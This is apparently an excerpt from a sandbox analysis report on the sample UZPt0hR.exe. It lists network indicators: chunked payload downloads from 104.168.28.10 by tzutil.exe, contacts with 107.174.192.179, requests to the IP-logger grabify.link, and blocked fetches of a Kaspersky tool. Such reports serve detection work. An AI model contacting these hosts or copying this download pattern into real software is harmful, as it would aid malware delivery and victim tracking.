Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=655360-720895 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=720896-786431 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=786432-851967 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=851968-917503 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=917504-1048575 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1048576-1179647 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1179648-1310719 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1310720-1441791 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1441792-1572863 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1572864-1703935 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1703936-1835007 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1835008-1966079 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1966080-2228223 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2228224-2490367 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2490368-2752511 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2752512-3014655 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3014656-3276799 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3276800-3538943 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3538944-3801087 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3801088-4325375 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=4325376-4849663 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=4849664-5373951 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5373952-5606383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
Source: unknown | TCP traffic detected without corresponding DNS query: 107.174.192.179 (this finding is listed 50 times in the report)
                    Source: C:\Users\user\Desktop\UZPt0hR.exe | Code function: 0_2_00420720 recv, 0_2_00420720
                    Source: global traffic | HTTP traffic detected: GET /ZATFQO HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: grabify.link
                    Source: global traffic | HTTP traffic detected: GET /images/pixel.png HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: grabify.link | Cookie: g_session=eyJpdiI6Ijk5TXlFYUU4eFVRM0hHWWVUeUVRd2c9PSIsInZhbHVlIjoiUVV0MkhFWDNKUGEweHNISFFtanBHSkN3NTB0ejkzRWwyRFZLcTRUUW0yQ3M4N09mbWlXTnVDRGhtUy9uUlBWbWdNeHQ1aVdhcmdlZTQ5U1RWWUxKZ3QwV2ZBNkNVVUlweUZQR2F2a2VxMXVMZ083K0F6NXF0dnNMcis2Y3FIUWoiLCJtYWMiOiI5M2EzOGFjYTA4OTM0ODgyN2VmMTgyOTcwMmM4NTJkODZkNzc3YzY3MjNhZDQ3NGVmNjliODg1ZDI0ZGFhMmJhIiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IlJvSE93YVV1ZlFJcTBIMENXc0pYOEE9PSIsInZhbHVlIjoia0tWUHlIQndYMG14VndnT1hlVmNLbVhLTitSQ2J5RFJIZ1RxYkNrUFVLcWdJSFFBczMxeXpRYk01NEk4cTBFN3JEVmJ1WWc1enY0NHl6SERrSXhBbUtEYmgvWGJTSC90SmdEZVRlYUR1VkJQV0lCS3BSUFdiU0MzeUdGZzViRjkiLCJtYWMiOiI1YWJhMmFmMjRmNTZmYTgwZWRiZWJmNWU3OGJkMjA5YjFhMzk2OTY0OTJmNDgwNzllYzVjZDE3MjdkM2Q1MGM4IiwidGFnIjoiIn0%3D
                    Source: global traffic | HTTP traffic detected: GET /devbuilds/KVRT/latest/full/KVRT.exe HTTP/1.1 | Host: devbuilds.s.kaspersky-labs.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edg/91.0.808.57 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /data/003 HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: 107.174.192.179
                    Source: global traffic | HTTP traffic detected: GET /clean HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: 107.174.192.179
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=0-16383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=16384-32767 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=32768-49151 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=49152-65535 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=81920-98303 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=98304-114687 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=114688-131071 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=65536-81919 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=131072-163839 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=163840-196607 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=196608-229375 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=229376-262143 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=262144-294911 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=294912-327679 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=327680-360447 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=360448-393215 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=393216-458751 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=458752-524287 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=524288-589823 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=589824-655359 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=655360-720895 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=720896-786431 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=786432-851967 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=851968-917503 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=917504-1048575 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1048576-1179647 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1179648-1310719 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1310720-1441791 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1441792-1572863 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1572864-1703935 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1703936-1835007 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1835008-1966079 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=1966080-2228223 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2228224-2490367 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2490368-2752511 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=2752512-3014655 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3014656-3276799 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3276800-3538943 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3538944-3801087 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=3801088-4325375 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=4325376-4849663 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=4849664-5373951 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | HTTP traffic detected: GET /003/01/d1 HTTP/1.1 | Host: 104.168.28.10 | Range: bytes=5373952-5606383 | User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3 | Accept: */*
                    Source: global traffic | DNS traffic detected: DNS query: grabify.link
                    Source: global traffic | DNS traffic detected: DNS query: devbuilds.s.kaspersky-labs.com
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Sun, 06 Apr 2025 11:44:29 GMT | Content-Length: 353 | Connection: close | Cache-Control: no-cache | Content-Type: text/html | Set-Cookie: klid=39881c0467f2691d7515eeefacb5ea82; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:29 GMT; HttpOnly
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Sun, 06 Apr 2025 11:44:30 GMT | Content-Length: 353 | Connection: close | Cache-Control: no-cache | Content-Type: text/html | Set-Cookie: klid=39881c0467f2691e7515eef0acb3ddc0; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:30 GMT; HttpOnly
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Sun, 06 Apr 2025 11:44:30 GMT | Content-Length: 353 | Connection: close | Cache-Control: no-cache | Content-Type: text/html | Set-Cookie: klid=39881c0467f2691e7515eef2acbd8437; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:30 GMT; HttpOnly
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Sun, 06 Apr 2025 11:44:30 GMT | Content-Length: 353 | Connection: close | Cache-Control: no-cache | Content-Type: text/html | Set-Cookie: klid=39881c0467f2691e7515eef4acb94929; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:30 GMT; HttpOnly
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Sun, 06 Apr 2025 11:44:31 GMT | Content-Length: 353 | Connection: close | Cache-Control: no-cache | Content-Type: text/html | Set-Cookie: klid=39881c0467f2691f7515eee6acb35855; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:31 GMT; HttpOnly
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Sun, 06 Apr 2025 11:44:32 GMT | Content-Length: 353 | Connection: close | Cache-Control: no-cache | Content-Type: text/html | Set-Cookie: klid=39881c0467f269207515eee9acb7edfd; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:32 GMT; HttpOnly
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Sun, 06 Apr 2025 11:44:32 GMT | Content-Length: 353 | Connection: close | Cache-Control: no-cache | Content-Type: text/html | Set-Cookie: klid=39881c0467f269207515eeebacbb4210; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:32 GMT; HttpOnly
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Sun, 06 Apr 2025 11:44:33 GMT | Content-Length: 353 | Connection: close | Cache-Control: no-cache | Content-Type: text/html | Set-Cookie: klid=39881c0467f269217515eeedacb31582; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:33 GMT; HttpOnly
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Sun, 06 Apr 2025 11:44:33 GMT | Content-Length: 353 | Connection: close | Cache-Control: no-cache | Content-Type: text/html | Set-Cookie: klid=39881c0467f269217515eeeeacb311f5; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:33 GMT; HttpOnly
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Sun, 06 Apr 2025 11:44:34 GMT | Content-Length: 353 | Connection: close | Cache-Control: no-cache | Content-Type: text/html | Set-Cookie: klid=39881c0467f269227515eef0acb3f45c; domain=.kaspersky-labs.com; path=/; expires=Mon, 06-Apr-2026 11:44:34 GMT; HttpOnly
                    Source: tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/003/01/d1
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/003/01/d1B
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/003/01/d1D
                    Source: tzutil.exe, 0000000F.00000002.1476688498.00000000026D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/003/01/d1GMT
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/003/01/d1I
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/003/01/d1N
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/003/01/d1P
                    Source: tzutil.exe, 0000000F.00000002.1476622096.0000000002383000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/003/01/d1PCUSERD
                    Source: tzutil.exe, 0000000F.00000003.1446517407.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1461232145.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1446231451.00000000026FA000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000002.1476752101.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1450802419.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1449027111.00000000026FD000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 0000000F.00000003.1448981959.00000000026FD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://104.168.28.10/003/01/d1_
